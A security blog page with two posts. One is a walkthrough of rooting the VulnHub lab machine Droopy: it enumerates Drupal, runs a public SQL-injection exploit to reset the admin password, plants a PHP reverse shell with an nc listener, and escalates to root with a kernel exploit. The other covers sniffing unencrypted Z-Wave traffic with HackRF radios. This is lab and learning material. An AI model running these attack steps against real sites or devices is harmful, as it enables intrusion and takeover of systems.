Friday, 29 April 2016

Walkthrough Droopy v.02


In this post I outline the steps I followed to get root on Droopy, hosted at VulnHub: https://www.vulnhub.com/entry/droopy-v02,143/.

From this post onwards I will also list all the useful links I used to compromise the box, for posterity.

Detailed Steps to root:

An nmap scan of the box reveals that only port 80 is open and that a Drupal 7 website is hosted there. After running nikto and dirbuster I decided to run a tool to enumerate CMSs. I know a good one exists for WordPress, but surprisingly I could not find much for Drupal. I did come across a tool called CMSmap which, according to its GitHub page, enumerates WordPress, Drupal and Joomla. I decided to give it a try to see what information it could reveal; I also really wanted to learn about Drupal enumeration tools and techniques.

Since the tool is not built into Kali, I followed the GitHub instructions and built it on my box.

./cmsmap.py -t http://192.168.238.132/ -f D -F
[-] Date & Time: 29/04/2016 07:31:43
[-] Target: http://192.168.238.132
[M] Website Not in HTTPS: http://192.168.238.132
[I] Server: Apache/2.4.7 (Ubuntu)
[I] X-Powered-By: PHP/5.5.9-1ubuntu4.5
[L] X-Generator: Drupal 7 (http://drupal.org)
[L] X-Frame-Options: Not Enforced
[I] Strict-Transport-Security: Not Enforced
[I] X-Content-Security-Policy: Not Enforced
[I] X-Content-Type-Options: Not Enforced
[L] Robots.txt Found: http://192.168.238.132/robots.txt
[I] CMS Detection: Drupal
[I] Drupal Version: 7.30
[H] Drupal Vulnerable to SA-CORE-2014-005
[I] Drupal Theme: bartik
[-] Enumerating Drupal Usernames via "Views" Module...
[I] Autocomplete Off Not Found: http://192.168.238.132/?q=user
[-] Drupal Default Files:
[I] http://192.168.238.132/README.txt
[I] http://192.168.238.132/INSTALL.mysql.txt
[I] http://192.168.238.132/MAINTAINERS.txt
[I] http://192.168.238.132/profiles/standard/translations/README.txt
[I] http://192.168.238.132/profiles/minimal/translations/README.txt
[I] http://192.168.238.132/INSTALL.pgsql.txt
[I] http://192.168.238.132/UPGRADE.txt
[I] http://192.168.238.132/CHANGELOG.txt
[I] http://192.168.238.132/INSTALL.sqlite.txt
[I] http://192.168.238.132/LICENSE.txt
[I] http://192.168.238.132/INSTALL.txt
[I] http://192.168.238.132/COPYRIGHT.txt
[I] http://192.168.238.132/web.config
[I] http://192.168.238.132/modules/README.txt
[I] http://192.168.238.132/modules/simpletest/files/README.txt
[I] http://192.168.238.132/modules/simpletest/files/javascript-1.txt
[I] http://192.168.238.132/modules/simpletest/files/php-1.txt
[I] http://192.168.238.132/modules/simpletest/files/sql-1.txt
[I] http://192.168.238.132/modules/simpletest/files/html-1.txt
[I] http://192.168.238.132/modules/simpletest/tests/common_test_info.txt
[I] http://192.168.238.132/modules/filter/tests/filter.url-output.txt
[I] http://192.168.238.132/modules/filter/tests/filter.url-input.txt
[I] http://192.168.238.132/modules/search/tests/UnicodeTest.txt
[I] http://192.168.238.132/themes/README.txt
[I] http://192.168.238.132/themes/stark/README.txt
[I] http://192.168.238.132/sites/README.txt
[I] http://192.168.238.132/sites/all/modules/README.txt
[I] http://192.168.238.132/sites/all/themes/README.txt
[I] http://192.168.238.132/modules/simpletest/files/html-2.html
[I] http://192.168.238.132/modules/color/preview.html
[I] http://192.168.238.132/themes/bartik/color/preview.html
[-] Interesting Directories/Files ...
[L] http://192.168.238.132/info.php
[L] http://192.168.238.132/install.php
[I] Forgotten Password Allows Username Enumeration: http://192.168.238.132/?q=user/password
[-] Search Drupal Modules ...
[I] comment
[I] content
[I] field
[I] node
[I] search
[I] system
[I] user
[I] aggregator
[I] block
[I] blog
[I] book
[I] color
[I] comment
[I] contact
[I] contextual
[I] dashboard
[I] dblog
[I] field
[I] field_ui
[I] file
[I] filter
[I] forum
[I] help
[I] image
[I] locale
[I] menu
[I] node
[I] openid
[I] overlay
[I] path
[I] php
[I] poll
[I] profile
[I] rdf
[I] search
[I] shortcut
[I] simpletest
[I] statistics
[I] syslog
[I] system
[I] taxonomy
[I] toolbar
[I] tracker
[I] translation
[I] trigger
[I] update
[I] user
[I] Checking for Directory Listing Enabled ...
[L] http://192.168.238.132/includes/
[L] http://192.168.238.132/misc/
[L] http://192.168.238.132/modules/
[L] http://192.168.238.132/profiles/
[L] http://192.168.238.132/scripts/
[L] http://192.168.238.132/sites/
[L] http://192.168.238.132/includes/
[L] http://192.168.238.132/themes/
[L] http://192.168.238.132/modules/comment
[L] http://192.168.238.132/modules/field
[L] http://192.168.238.132/modules/node
[L] http://192.168.238.132/modules/search
[L] http://192.168.238.132/modules/system
[L] http://192.168.238.132/modules/user
[L] http://192.168.238.132/modules/aggregator
[L] http://192.168.238.132/modules/block
[L] http://192.168.238.132/modules/blog
[L] http://192.168.238.132/modules/book
[L] http://192.168.238.132/modules/color
[L] http://192.168.238.132/modules/comment
[L] http://192.168.238.132/modules/contact
[L] http://192.168.238.132/modules/contextual
[L] http://192.168.238.132/modules/dashboard
[L] http://192.168.238.132/modules/dblog
[L] http://192.168.238.132/modules/field
[L] http://192.168.238.132/modules/field_ui
[L] http://192.168.238.132/modules/file
[L] http://192.168.238.132/modules/filter
[L] http://192.168.238.132/modules/forum
[L] http://192.168.238.132/modules/help
[L] http://192.168.238.132/modules/image
[L] http://192.168.238.132/modules/locale
[L] http://192.168.238.132/modules/menu
[L] http://192.168.238.132/modules/node
[L] http://192.168.238.132/modules/openid
[L] http://192.168.238.132/modules/overlay
[L] http://192.168.238.132/modules/path
[L] http://192.168.238.132/modules/php
[L] http://192.168.238.132/modules/poll
[L] http://192.168.238.132/modules/profile
[L] http://192.168.238.132/modules/rdf
[L] http://192.168.238.132/modules/search
[L] http://192.168.238.132/modules/shortcut
[L] http://192.168.238.132/modules/simpletest
[L] http://192.168.238.132/modules/statistics
[L] http://192.168.238.132/modules/syslog
[L] http://192.168.238.132/modules/system
[L] http://192.168.238.132/modules/taxonomy
[L] http://192.168.238.132/modules/toolbar
[L] http://192.168.238.132/modules/tracker
[L] http://192.168.238.132/modules/translation
[L] http://192.168.238.132/modules/trigger
[L] http://192.168.238.132/modules/update
[L] http://192.168.238.132/modules/user
[-] Date & Time: 29/04/2016 07:37:02
[-] Completed in: 0:05:19


The tool was quite good at enumerating the Drupal site and immediately tells us that it is outdated and suffers from a known vulnerability: "Drupal Vulnerable to SA-CORE-2014-005".
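As an added example (not part of the original post or of CMSmap), the check below turns the two findings above, the 7.30 version string and the unenforced response headers, into a repeatable patch-level triage a site owner can run: the CHANGELOG line and header set are constructed from the scan output, and the standard Content-Security-Policy name is used where CMSmap printed X-Content-Security-Policy.

```python
import re

# Added example, not part of the original post or of CMSmap.
# Core advisories to check, keyed to the first 7.x release that fixed them.
# SA-CORE-2014-005 (the one the scan flagged) was fixed in Drupal 7.32.
FIXED_IN = {"SA-CORE-2014-005": (7, 32)}

# Hardening headers the scan reported as "Not Enforced" on this box.
EXPECTED_HEADERS = (
    "X-Frame-Options",
    "Strict-Transport-Security",
    "Content-Security-Policy",
    "X-Content-Type-Options",
)

# Headers that disclose the software stack to any client that asks.
DISCLOSING_HEADERS = ("Server", "X-Powered-By", "X-Generator")

def drupal_version(changelog_text):
    """Extract (major, minor) from the first 'Drupal X.Y, date' line of CHANGELOG.txt."""
    m = re.search(r"^Drupal (\d+)\.(\d+)", changelog_text, re.MULTILINE)
    if not m:
        return None
    return int(m.group(1)), int(m.group(2))

def outstanding_advisories(version):
    """Advisories whose fix release is newer than the installed version."""
    return sorted(sa for sa, fixed in FIXED_IN.items() if version < fixed)

def header_findings(headers):
    """Return (missing hardening headers, stack-disclosing headers), case-insensitively."""
    present = {k.lower(): v for k, v in headers.items()}
    missing = [h for h in EXPECTED_HEADERS if h.lower() not in present]
    disclosed = {h: present[h.lower()] for h in DISCLOSING_HEADERS if h.lower() in present}
    return missing, disclosed

# Constructed inputs mirroring the scan output (not a live capture).
SAMPLE_CHANGELOG = "Drupal 7.30, 2014-07-24\n-----------------------\n- Fixed security issues\n"
SAMPLE_HEADERS = {
    "Server": "Apache/2.4.7 (Ubuntu)",
    "X-Powered-By": "PHP/5.5.9-1ubuntu4.5",
    "X-Generator": "Drupal 7 (http://drupal.org)",
    "Content-Type": "text/html; charset=utf-8",
}

if __name__ == "__main__":
    ver = drupal_version(SAMPLE_CHANGELOG)
    print("Drupal version:", ver, "unpatched advisories:", outstanding_advisories(ver))
    print("missing / disclosing headers:", header_findings(SAMPLE_HEADERS))
```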

This means there is a possibility of launching SQL injection attacks against the box. I decided to use an existing exploit. The exploit https://www.exploit-db.com/exploits/34984/ changes the admin credentials on the backend site.

python drupal_exploit.py http://192.168.238.132/ admin hello
host username password
http://nope.io admin wowsecure
Success!
Login now with user:admin and pass:hello


The exploit worked and we have changed the admin credentials on the box. We now log in with the credentials "admin:hello".

Once logged in we are able to create additional posts/pages. Checking under the "Modules" tab I see that there is a module called "phpfilter" which can be enabled to allow PHP content to be executed on a page. This opens the possibility of executing a PHP reverse shell by creating a page containing it and requesting that page via the web server, so we try this approach. I use the standard reverse shell from pentest monkey.

nc -lvnp 4545
listening on [any] 4545 ...
connect to [192.168.238.133] from (UNKNOWN) [192.168.238.132] 51139
Linux droopy 3.13.0-43-generic #72-Ubuntu SMP Mon Dec 8 19:35:06 UTC 2014 x86_64 x86_64 x86_64 GNU/Linux
09:46:02 up 1:33, 0 users, load average: 0.05, 0.03, 0.05
USER TTY FROM LOGIN@ IDLE JCPU PCPU WHAT
uid=33(www-data) gid=33(www-data) groups=33(www-data)
/bin/sh: 0: can't access tty; job control turned off
$ uname -a
Linux droopy 3.13.0-43-generic #72-Ubuntu SMP Mon Dec 8 19:35:06 UTC 2014 x86_64 x86_64 x86_64 GNU/Linux
$ hostname
droopy
$ cat /etc/issue
Ubuntu 14.04.1 LTS \n \l
$ arch
x86_64



Once we get a reverse shell we see that the box is a 64-bit Ubuntu 14.04 box, which is known to be vulnerable to the local privilege escalation exploit https://www.exploit-db.com/exploits/37292/. We compile and run the exploit to get root on the box.

$ gcc ubuntu_ex.c -o ub
gcc ubuntu_ex.c -o ub
$ ./ub
./ub
spawning threads
mount #1
mount #2
child threads done
/etc/ld.so.preload created
creating shared library
# id
id
uid=0(root) gid=0(root) groups=0(root),33(www-data)
#
Also, for completeness, I must admit I could have used a Metasploit module to get a shell, but I wanted to avoid using Metasploit as much as possible :0

Final Verdict:

Overall it was a relatively easy box to pwn but fun nevertheless. Thanks to the creator for taking the time to make it. Keep up the good work "knightmare".

Useful Links:

https://github.com/Dionach/CMSmap
https://www.drupal.org/SA-CORE-2014-005
https://www.exploit-db.com/exploits/37292/
https://www.rapid7.com/db/modules/exploit/multi/http/drupal_drupageddon

Wednesday, 13 April 2016

Z-wave protocol analysis using Ez-Wave

Background: Recently I was able to get my hands on a couple of IoT devices that talk the proprietary Z-Wave protocol. Specifically I had 2 devices:

i) A Z-Wave 3-in-1 PIR motion sensor which can detect movement, temperature and luminance.
ii) A Z-Wave smart energy plug which reports the energy consumption of the device connected to it. It can also switch that device ON/OFF depending on the requests sent to it by a Z-Wave controller.

These devices are already deployed in many smart homes, so it is important to analyze their security capabilities. This got me rolling, and here is a post about how to sniff Z-Wave packets using SDR. It seems that the state of the art in pentesting any wireless communication protocol is to use these SDRs.

A detailed security assessment of the Z-Wave protocol and Z-Wave enabled devices was presented at ShmooCon 2016 in the talk "Breaking Bulbs Briskly by Bogus Broadcasts" (https://www.youtube.com/watch?v=IgquSEhAGvA) by Joseph Hall and Ben Ramsey, which details how many Z-Wave device manufacturers disregard security and don't even encrypt the data exchanged between the Z-Wave device and the Z-Wave controller. This opens up a range of attacks that can be launched against Z-Wave devices. They also released an open source tool to sniff and play around with these packets, called EZ-Wave. In this post I try to sniff some of the traffic generated by my Z-Wave devices.

EZ-wave Installation:

Install EZ-wave dependencies:

The instructions for installation are detailed on the GitHub site at https://github.com/AFITWiSec/EZ-Wave. However, a number of software bundles need to be installed, especially GNU Radio, which has a lot of dependencies. Hence instead of installing all these packages myself I used the Linux distribution Pentoo Linux (http://www.pentoo.ch/about). The advantage of using Pentoo is that all the software required for the EZ-Wave installation, such as GNU Radio, OsmocomSDR, the HackRF host software, Wireshark etc., is pre-installed in the distro, saving the time to install it manually.

The simplest way is to download the Pentoo Linux image from the downloads section of the site and burn it onto a live USB stick. One important thing to note is that Michael Ossmann (maker of the HackRF) strongly recommends in his "Introduction to SDR" tutorial (https://greatscottgadgets.com/sdr/) not connecting the HackRF to a virtual machine, for performance reasons, but using it directly on the base OS. On a side note, if you are a newbie it is highly recommended to go through at least his first tutorial, where he introduces the SDR concepts (https://greatscottgadgets.com/sdr/1/), and the tutorial on HackRF usage (https://greatscottgadgets.com/sdr/5/).

We now boot from the live USB. (In case you get an error like "boot device not found", press "Tab" on the keyboard and select the pentoo5 OS, or type it and press Enter.) Pentoo Linux should boot correctly. Launch a GUI using the "startx" command. In case no IP address is allocated to the box, run "dhcpcd eth0" to request one.

Now, to test that the HackRF software is working correctly, plug the HackRF devices into the USB ports and run the command "hackrf_info". I use 2 HackRFs since they are half-duplex and I wish to receive and transmit at the same time.

pentoo tools # hackrf_info
Found HackRF board 0:
Board ID Number: 2 (HackRF One)
Firmware Version: 2014.08.1
Part ID Number: 0xa000cb3c 0x006a434b
Serial Number: 0x00000000 0x00000000 0x14d463dc 0x0f54c1e1
Found HackRF board 1:
Board ID Number: 2 (HackRF One)
Firmware Version: 2014.08.1
Part ID Number: 0xa000cb3c 0x004f434b
Serial Number: 0x00000000 0x00000000 0x14d463dc 0x2f7c35e1
pentoo tools #

Install Scapy-Radio 

We can see that both our devices are correctly detected. Next we install the EZ-Wave tool itself. We run the setup.sh script, which clones the scapy-radio framework, and then we install it.

./setup.sh
cd root/scapy-radio
./install.sh scapy
./install.sh blocks
./install.sh grc


I noticed that if you use Pentoo Linux then you don't need to worry about making changes to the GNU Radio config file.

Install Wireshark

We download the source package for Wireshark version 1.12.10 from https://www.wireshark.org/download/src/ and copy the Wireshark dissector files into wireshark-1.12.10/epan/dissectors. Wireshark by default tries to use Qt version 5 for building the UI. This gave me errors, so I chose to build the Wireshark UI with GTK3. Hence it is important to tell Wireshark to use the GTK3 library instead of the Qt5 libraries at the configure stage. Our steps to build Wireshark were:

pentoo wireshark-1.12.10 # ./autogen.sh
aclocal -I ./aclocal-fallback
libtoolize --copy --force
....
....
....
Now type "./configure [options]" and "make" to compile Wireshark.
pentoo wireshark-1.12.10 # ./configure --with-qt=no --with-gtk3=yes
checking build system type... i686-pc-linux-gnu
checking host system type... i686-pc-linux-gnu
....
....
....
config.status: executing libtool commands
The Wireshark package has been configured with the following options.
Build wireshark (Gtk+) : yes (with GTK+ 3)
Build wireshark-qt : no
Build tshark : yes
Build capinfos : yes
Build captype : yes
Build editcap : yes
Build dumpcap : yes
Build mergecap : yes
Build reordercap : yes
Build text2pcap : yes
Build randpkt : yes
Build dftest : yes
Build rawshark : yes
Save files as pcap-ng by default : yes
Install dumpcap with capabilities : no
Install dumpcap setuid : no
Use dumpcap group : (none)
Use plugins : yes
Use Lua library : yes
Use Python binding : no
Build rtp_player : yes
Build profile binaries : no
Use pcap library : yes
Use zlib library : yes
Use kerberos library : yes (MIT)
Use c-ares library : yes
Use GNU ADNS library : no (using c-ares instead)
Use SMI MIB library : yes
Use GNU crypto library : yes
Use SSL crypto library : no
Use IPv6 name resolution : yes
Use gnutls library : yes
Use POSIX capabilities library : yes
Use GeoIP library : yes
Use nl library : yes (v3)
Use SBC codec library : yes
pentoo wireshark-1.12.10 # make
pentoo wireshark-1.12.10 # sudo make install
pentoo wireshark-1.12.10 # ldconfig


EZ-Wave Usage:

In order to sniff packets we start GNU Radio Companion and give it the Z-Wave radio configuration file as input.

Select the Zwave.grc file to open in the gnuradio-companion

One important thing to take note of in the .grc file is the centre frequency variable, center_freq. The European Z-Wave devices (which I have) talk on 868.42 MHz instead of the default centre frequency hardcoded in the .grc file, which is for US Z-Wave devices, and hence this variable needs to be changed to reflect the frequency of your device. To change the variable, double click it and key in the new value.

gnuradio-companion main window
After changing the .grc file we need to recompile the flow graph. Finally we can run it by pressing the play button in the top menu. (Also make sure that the Python modules are in the Python path environment variable, else there may be errors.)

The HackRFs should now be able to pick up Z-Wave packets in the vicinity. I forced the Z-Wave device to send some packets by pressing the button on the device body. All captured Z-Wave packets are sent to localhost:52002 and can be seen in Wireshark using the new dissector. You can apply a filter like !icmp to remove the interrogation commands sent to the Z-Wave devices.

Wireshark Z-wave packet capture

We can see the homid and nodeid of the captured Z-wave packet. The data exchanged between the Z-wave controller and the Z-wave device is also not encrypted.